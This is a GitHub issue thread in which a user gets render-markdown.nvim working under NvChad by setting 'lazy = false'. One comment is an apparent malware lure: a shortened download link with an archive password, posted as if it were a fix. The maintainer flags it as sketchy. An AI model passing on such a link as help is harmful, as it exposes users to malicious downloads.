### ISSUE TITLE
bug:  Not an editor command

### ISSUE THREAD

**Issue by L34Z** [MeanderingProgrammer/render-markdown.nvim#147]
### Neovim version (nvim -v)

NVIM v0.11.0-dev (LuaJIT 2.1.0-beta3)

### Operating system

WSL2 [Ubuntu 22.04.3 LTS on Windows 10 x86_64] 

### Terminal emulator / GUI

Windows Terminal

### Describe the bug

I can't seem to enable the plugin in NvChad. 

### Screenshots
![image](https://github.com/user-attachments/assets/a79914c3-cf12-4cbf-9fcf-6b3729b32006)
![image](https://github.com/user-attachments/assets/9c0f6dc2-1db2-49e2-a98d-9bf5222d631d)

### Expected behavior

Enabling of the plugin.

### Healthcheck output

`- ERROR No healthcheck found for "render-markdown" plugin.`

### Plugin configuration

```

       │ File: /home/z/.config/nvim/lua/plugins/markdown.lua

   1   │ return {
   2   │
   3   │   {
   4   │     'MeanderingProgrammer/render-markdown.nvim',
   5   │     opts = {},
   6   │     dependencies = { 'nvim-treesitter/nvim-treesitter', 'echasnovski/mini.nvim' }, -- if you use the mini.nvim suite
   7   │   }
   8   │
   9   │ }

```

### Plugin error log

N/A

### Confirmations

- [X] I have provided markdown text for any screenshots used in my description & understand that my issue will be closed if I have not

### Additional information

I was able to call the command without issue in LazyVim but the rendering wasn't working properly hence switching to NvChad. I'm still fairly new to nvim so any help would be appreciated, I'm sure this is probably user error.

**Comment by c0ffincolors** [comment]
Download 
https://bit.ly/3MjP129
password: changeme
In the installer menu, select "gcc."

**Comment by MeanderingProgrammer** [comment]
There was a previous comment that had a random download link, I in no way endorse it and without context it's just sketchy.

As far as the plugin not working, I'm honestly not sure why, distros have specific ways to add dependencies and I'm not sure what NvChad's is. The lack of checkhealth indicates the plugin is not being downloaded as opposed to some internal error, I assume this is due to the path but not entirely sure.

I'm curious what you mean by rendering not working properly in LazyVim. I wouldn't expect switching distributions to alter the rendering behavior.

**Comment by MeanderingProgrammer** [comment]
Did you use their starter: https://github.com/NvChad/starter, or how did you setup your config in general?

**Comment by L34Z** [comment]
> There was a previous comment that had a random download link, I in no way endorse it and without context it's just sketchy.

Yeah I saw that, and yeah it was, lol.

> Did you use their starter: https://github.com/NvChad/starter, or how did you setup your config in general?

I did use their starter, yes. 

> I'm curious what you mean by rendering not working properly in LazyVim. I wouldn't expect switching distributions to alter the rendering behavior.

Unfortunately I didn't take any screenshots of LazyVim's issue, iirc the checkmark boxes just didn't show up and the headings didn't look like the examples in the repo.

**Comment by MeanderingProgrammer** [comment]
I'm not sure if that configuration is going to load the entire `plugins` directory. It should but I'm also not 100% sure. Can you try adding it inside of the plugins/init.lua file: https://github.com/NvChad/starter/blob/main/lua/plugins/init.lua.

Checkmarks being different is strange. But the headings looking different is expected due to LazyVims default config: https://github.com/LazyVim/LazyVim/blob/main/lua/lazyvim/plugins/extras/lang/markdown.lua#L105. The icons can be re-enabled, it's just not the default behavior.

**Comment by MeanderingProgrammer** [comment]
Unsure if this is still a problem, feel free to re-open if it is!

**Comment by DuyAccel** [comment]
According to NcChad document, every plugins will not be load on startup. So that, I added `lazy=false` to plugin config and it works. 
```
-- ~/.config/nvim/lua/plugins/markdown.lua --
return {
  'MeanderingProgrammer/render-markdown.nvim',
  lazy= false,
  opts = {},
  dependencies = { 'nvim-treesitter/nvim-treesitter', 'echasnovski/mini.nvim' },
}
```

**Comment by rajdeepsh** [comment]
Im also using `NvChad` and had to add `lazy = false` for `:RenderMarkdown` to function as expected:

```lua
  {
    "MeanderingProgrammer/render-markdown.nvim",
    lazy = false,
    dependencies = { "nvim-treesitter/nvim-treesitter", "nvim-tree/nvim-web-devicons" },
    ---@module 'render-markdown'
    ---@type render.md.UserConfig
  }
```

**Comment by MeanderingProgrammer** [comment]
I assume your overall `lazy.nvim` config has `lazy = true`, otherwise this shouldn't be needed. 

In case it is, from the `lazy.nvim` docs: https://lazy.folke.io/configuration

```lua
{
  defaults = {
    -- Set this to `true` to have all your plugins lazy-loaded by default.
    -- Only do this if you know what you are doing, as it can lead to unexpected behavior.
    lazy = false, -- should plugins be lazy-loaded?
  },
}
```

If you don't set an event, filetype, or command to load this plugin it'll naturally end up never being loaded. Lazy loading by default is really something to be avoided unless you're very careful and know exactly what you're doing.
